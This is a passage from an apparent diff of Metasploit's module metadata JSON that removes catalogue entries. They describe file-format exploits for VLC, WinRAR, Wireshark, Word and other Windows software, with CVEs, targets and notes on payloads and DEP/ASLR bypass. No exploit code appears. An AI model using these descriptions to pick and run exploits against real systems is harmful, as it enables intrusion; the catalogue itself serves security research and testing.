This allows attackers to overwrite it with any arbitrary value, and results code\n execution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n null if no match is found, and then it is validated before use.\n\n NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a\n victim user to 'double click' the malicious VWR file and execute code. This module was also built\n to bypass ASLR and DEP.", - "references": [ - "CVE-2011-2386", - "OSVDB-72464", - "URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html", - "URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3/Windows 7 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/visiwave_vwr_type.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/visiwave_vwr_type", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_mkv": { - "name": "VLC Media Player MKV Use After Free", - "fullname": "exploit/windows/fileformat/vlc_mkv", - "aliases": [], - "rank": 500, - "disclosure_date": "2018-05-24", - "type": "exploit", - "author": [ - "Eugene Ng - GovTech", - "Winston Ho - GovTech" - ], - "description": "This module exploits a use after free vulnerability in\n VideoLAN VLC =< 2.2.8. 
The vulnerability exists in the parsing of\n MKV files and affects both 32 bits and 64 bits.\n\n In order to exploit this, this module will generate two files:\n The first .mkv file contains the main vulnerability and heap spray,\n the second .mkv file is required in order to take the vulnerable code\n path and should be placed under the same directory as the .mkv file.\n\n This module has been tested against VLC v2.2.8. Tested with payloads\n windows/exec, windows/x64/exec, windows/shell/reverse_tcp,\n windows/x64/shell/reverse_tcp. Meterpreter payloads if used can\n cause the application to crash instead.", - "references": [ - "CVE-2018-11529", - "EDB-44979" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 2.2.8 on Windows 10 x86", - "VLC 2.2.8 on Windows 10 x64" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_mkv.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_mkv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_modplug_s3m": { - "name": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/vlc_modplug_s3m", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-04-07", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. 
As such,\n this module is capable of bypassing DEP, but not ASLR.", - "references": [ - "CVE-2011-1574", - "OSVDB-72143", - "URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b", - "URL-https://seclists.org/fulldisclosure/2011/Apr/113" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 1.1.8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_modplug_s3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_realtext": { - "name": "VLC Media Player RealText Subtitle Overflow", - "fullname": "exploit/windows/fileformat/vlc_realtext", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-11-05", - "type": "exploit", - "author": [ - "Tobias Klein", - "SkD", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is used to trick your victim into running. 
The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.", - "references": [ - "OSVDB-49809", - "CVE-2008-5036", - "BID-32125", - "URL-http://www.trapkit.de/advisories/TKADV2008-011.txt", - "URL-http://www.videolan.org/security/sa0810.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_realtext.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_realtext", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_smb_uri": { - "name": "VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow", - "fullname": "exploit/windows/fileformat/vlc_smb_uri", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-06-24", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the Win32AddConnection\n function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n reportedly affected.\n\n This vulnerability is only present in Win32 builds of VLC.\n\n This payload was found to work with the windows/exec and\n windows/meterpreter/reverse_tcp payloads. 
However, the\n windows/meterpreter/reverse_ord_tcp was found not to work.", - "references": [ - "BID-35500", - "OSVDB-55509", - "CVE-2009-2484", - "URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f", - "EDB-9029" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "vlc 0.9.9 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_smb_uri.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_smb_uri", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_webm": { - "name": "VideoLAN VLC MKV Memory Corruption", - "fullname": "exploit/windows/fileformat/vlc_webm", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-01-31", - "type": "exploit", - "author": [ - "Dan Rosenberg" - ], - "description": "This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. 
By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.", - "references": [ - "OSVDB-70698", - "CVE-2011-0531", - "BID-46060", - "URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456", - "URL-http://www.videolan.org/security/sa1102.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 1.1.6 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_webm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_webm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vuplayer_cue": { - "name": "VUPlayer CUE Buffer Overflow", - "fullname": "exploit/windows/fileformat/vuplayer_cue", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack based overflow in VUPlayer <= 2.49. 
When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.", - "references": [ - "OSVDB-64581", - "BID-33960" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VUPlayer 2.49" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vuplayer_cue", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vuplayer_m3u": { - "name": "VUPlayer M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/vuplayer_m3u", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack over flow in VUPlayer <= 2.49. 
When\n the application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n for the execution of arbitrary code.", - "references": [ - "CVE-2006-6251", - "OSVDB-31710" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VUPlayer 2.49" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vuplayer_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/watermark_master": { - "name": "Watermark Master Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/watermark_master", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-01", - "type": "exploit", - "author": [ - "metacom", - "Andrew Smith" - ], - "description": "This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when\n processing a specially crafted .WCF file. 
This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Watermark Master to open a malicious .WCF file.", - "references": [ - "OSVDB-99226", - "CVE-2013-6935", - "EDB-29327" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x32 - Watermark Master 2.2.23", - "Windows 7 x64 - Watermark Master 2.2.23" - ], - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/exploits/windows/fileformat/watermark_master.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/watermark_master", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winamp_maki_bof": { - "name": "Winamp MAKI Buffer Overflow", - "fullname": "exploit/windows/fileformat/winamp_maki_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-05-20", - "type": "exploit", - "author": [ - "Monica Sojeong Hong", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in Winamp 5.55. The flaw\n exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,\n where memmove is used in an insecure way with user controlled data.\n\n To exploit the vulnerability the attacker must convince the victim to install the\n generated mcvcore.maki file in the \"scripts\" directory of the default \"Bento\" skin,\n or generate a new skin using the crafted mcvcore.maki file. 
The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2009-1831", - "OSVDB-54902", - "BID-35052", - "EDB-8783", - "EDB-8772", - "EDB-8770", - "EDB-8767", - "URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winamp 5.55 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/winamp_maki_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winamp_maki_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winrar_ace": { - "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution", - "fullname": "exploit/windows/fileformat/winrar_ace", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-02-05", - "type": "exploit", - "author": [ - "Nadav Grossman", - "Imran E. Dawoodjee " - ], - "description": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability\n when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n field is manipulated with specific patterns, the destination (extraction) folder is\n ignored, thus treating the filename as an absolute path. This module will attempt to\n extract a payload to the startup folder of the current user. It is limited such that\n we can only go back one folder. Therefore, for this exploit to work properly, the user\n must extract the supplied RAR file from one folder within the user profile folder\n (e.g. Desktop or Downloads). 
User restart is required to gain a shell.", - "references": [ - "CVE-2018-20250", - "EDB-46552", - "BID-106948", - "URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/", - "URL-https://apidoc.roe.ch/acefile/latest/", - "URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "RARLAB WinRAR <= 5.61" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/winrar_ace.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winrar_ace", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winrar_cve_2023_38831": { - "name": "WinRAR CVE-2023-38831 Exploit", - "fullname": "exploit/windows/fileformat/winrar_cve_2023_38831", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-23", - "type": "exploit", - "author": [ - "Alexander \"xaitax\" Hagenah" - ], - "description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). 
When a user opens a crafted RAR file and its\n embedded document, the decoy document is executed, leading to code execution.", - "references": [ - "CVE-2023-38831", - "URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", - "URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2024-05-28 14:01:31 +0000", - "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winrar_cve_2023_38831", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winrar_name_spoofing": { - "name": "WinRAR Filename Spoofing", - "fullname": "exploit/windows/fileformat/winrar_name_spoofing", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-28", - "type": "exploit", - "author": [ - "chr1x", - "juan vazquez " - ], - "description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. 
This inconsistency allows to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014", - "references": [ - "OSVDB-62610", - "BID-66383", - "URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html", - "URL-http://an7isec.blogspot.co.il/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winrar_name_spoofing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/wireshark_mpeg_overflow": { - "name": "Wireshark wiretap/mpeg.c Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/wireshark_mpeg_overflow", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-03-20", - "type": "exploit", - "author": [ - "Wesley Neelen", - "j0sm1" - ], - "description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.", - "references": [ - "CVE-2014-2299", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843", - "URL-http://www.wireshark.org/security/wnpa-sec-2014-04.html", - "BID-66066" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinXP SP3 Spanish (bypass DEP)", - "WinXP SP2/SP3 English (bypass DEP)" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/wireshark_mpeg_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/wireshark_packet_dect": { - "name": "Wireshark packet-dect.c Stack Buffer Overflow (local)", - "fullname": "exploit/windows/fileformat/wireshark_packet_dect", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-18", - "type": "exploit", - "author": [ - "Paul Makowski", - "sickness", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n When opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n resulting in arbitrary code execution.\n\n Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")).", - "references": [ - "CVE-2011-1591", - "OSVDB-71848", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", - "EDB-17185" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win32 Universal (Generic DEP & ASLR Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/wireshark_packet_dect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/wm_downloader_m3u": { - "name": "WM Downloader 3.1.2.2 Buffer Overflow", - "fullname": "exploit/windows/fileformat/wm_downloader_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-28", - "type": "exploit", - "author": [ - "fdisk", - "dookie" - ], - "description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. 
When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-66911", - "EDB-14497" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/wm_downloader_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/word_msdtjs_rce": { - "name": "Microsoft Office Word MSDTJS", - "fullname": "exploit/windows/fileformat/word_msdtjs_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-05-29", - "type": "exploit", - "author": [ - "nao sec", - "mekhalleh (RAMELLA Sébastien)", - "bwatters-r7" - ], - "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.", - "references": [ - "CVE-2022-30190", - "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/", - "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19", - "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - "URL-https://twitter.com/GossiTheDog/status/1531608245009367040", - "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Word" - ], - "mod_time": "2024-05-28 14:01:31 +0000", - "path": 
"/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/word_msdtjs_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Follina" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/word_mshtml_rce": { - "name": "Microsoft Office Word Malicious MSHTML RCE", - "fullname": "exploit/windows/fileformat/word_mshtml_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-09-23", - "type": "exploit", - "author": [ - "lockedbyte", - "klezVirus", - "thesunRider", - "mekhalleh (RAMELLA Sébastien)" - ], - "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.", - "references": [ - "CVE-2021-40444", - "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", - "URL-https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/", - "URL-http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf", - "URL-https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md", - "URL-https://github.com/klezVirus/CVE-2021-40444" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Hosted" - ], - "mod_time": "2024-05-28 14:01:31 +0000", - "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/word_mshtml_rce", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/xenorate_xpl_bof": { - "name": "Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/xenorate_xpl_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-19", - "type": "exploit", - "author": [ - "hack4love ", - "germaya_x", - "loneferret", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.", - "references": [ - "OSVDB-57162", - "EDB-10371" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 / SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/xenorate_xpl_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/xion_m3u_sehbof": { - "name": "Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/xion_m3u_sehbof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-23", - "type": "exploit", - "author": [ - "hadji samir ", - "corelanc0d3r ", - "digital1", - "jduck ", - "m_101" - ], - "description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. 
This results in overwriting a\n structured exception handler record.", - "references": [ - "OSVDB-66912", - "EDB-14517", - "EDB-14633", - "EDB-15598" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Xion Audio Player v1.0.126 XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/xion_m3u_sehbof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/xradio_xrl_sehbof": { - "name": "xRadio 0.95b Buffer Overflow", - "fullname": "exploit/windows/fileformat/xradio_xrl_sehbof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-08", - "type": "exploit", - "author": [ - "b0telh0 " - ], - "description": "This module exploits a buffer overflow in xRadio 0.95b.\n Using the application to import a specially crafted xrl file,\n a buffer overflow occurs allowing arbitrary code execution.", - "references": [ - "CVE-2008-2789", - "BID-46290", - "EDB-16141" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/xradio_xrl_sehbof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/zahir_enterprise_plus_csv": { - "name": "Zahir Enterprise Plus 6 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/zahir_enterprise_plus_csv", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-09-28", - "type": "exploit", - "author": [ - 
"f3ci", - "modpr0be" - ], - "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.", - "references": [ - "CVE-2018-17408", - "EDB-45505" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Zahir Enterprise Plus 6 <= build 10b" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/zahir_enterprise_plus_csv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/zinfaudioplayer221_pls": { - "name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/zinfaudioplayer221_pls", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-09-24", - "type": "exploit", - "author": [ - "Trancek ", - "aushack " - ], - "description": "This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Zinf.\n This functionality has not been tested in this module.", - "references": [ - "CVE-2004-0964", - "OSVDB-10416", - "EDB-7888", - "BID-11248" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Zinf Universal 2.2.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/zinfaudioplayer221_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/firewall/blackice_pam_icq": { - "name": "ISS PAM.dll ICQ Parser Buffer Overflow", - "fullname": "exploit/windows/firewall/blackice_pam_icq", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-03-18", - "type": "exploit", - "author": [ - "spoonm " - ], - "description": "This module exploits a stack buffer overflow in the ISS products that use\n the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n will result in arbitrary code execution as LocalSystem. This exploit\n only requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n address.\n\n The ISS exception handler will recover the process after each overflow, giving\n us the ability to bruteforce the service and exploit it multiple times.", - "references": [ - "CVE-2004-0362", - "OSVDB-4355", - "URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html" - ], - "platform": "Windows", - "arch": "", - "rport": 1, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Bruteforce", - "Bruteforce iis-pam1.dll", - "Bruteforce NT 4.0", - "iis-pam1.dll 3.6.06", - "iis-pam1.dll 3.6.11", - "WinNT SP3/SP4/SP5", - "WinNT SP4/SP5", - "WinNT SP5/SP6 - advapi32", - "WinNT SP3/SP5/SP6 - shell32", - "WinNT SP5/SP6 - mswsock", - "WinXP SP0/SP1 - shell32", - "WinXP SP0/SP1 - atl", - "WinXP SP0/SP1 - atl", - "WinXP SP0/SP1 - ws2_32", - "WinXP SP0/SP1 - mswsock", - "Windows 2000 Pro SP4 English", - "Win2000 SP0 - SP4", - "Win2000 SP2/SP3 - samlib", - "Win2000 SP0/SP1 - activeds", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English", - "WinXP SP0 - SP1", - "Win2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
